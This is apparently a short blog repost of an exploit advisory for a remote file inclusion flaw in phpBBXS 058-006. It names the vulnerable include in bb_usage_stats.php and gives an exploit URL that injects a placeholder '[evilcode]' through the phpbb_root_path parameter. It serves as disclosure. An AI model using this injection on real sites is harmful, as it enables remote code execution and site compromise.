LFI to RCE via access_log injection

on
18

phpBBXS 058-006 - RFI

on 

[o] phpBBXS 058-006 Remote File Inclusion Vulnerability
Software : phpBBXS version 058-006
Vendor   : http://www.phpbbxs.nl/
Author   : NoGe


[o] Vulnerable file
bb_usage_stats/include/bb_usage_stats.php
include($phpbb_root_path . 'bb_usage_stats/includes/bb_usage_stats_constants.' . $phpEx);


[o] Exploit
http://localhost/[path]/bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=[evilcode]


[o] Publish
http://www.securityfocus.com/bid/20046


Comments

labatterie said…
Thank you for the sensible critique.
December 2, 2010 at 9:04 PM
Post a Comment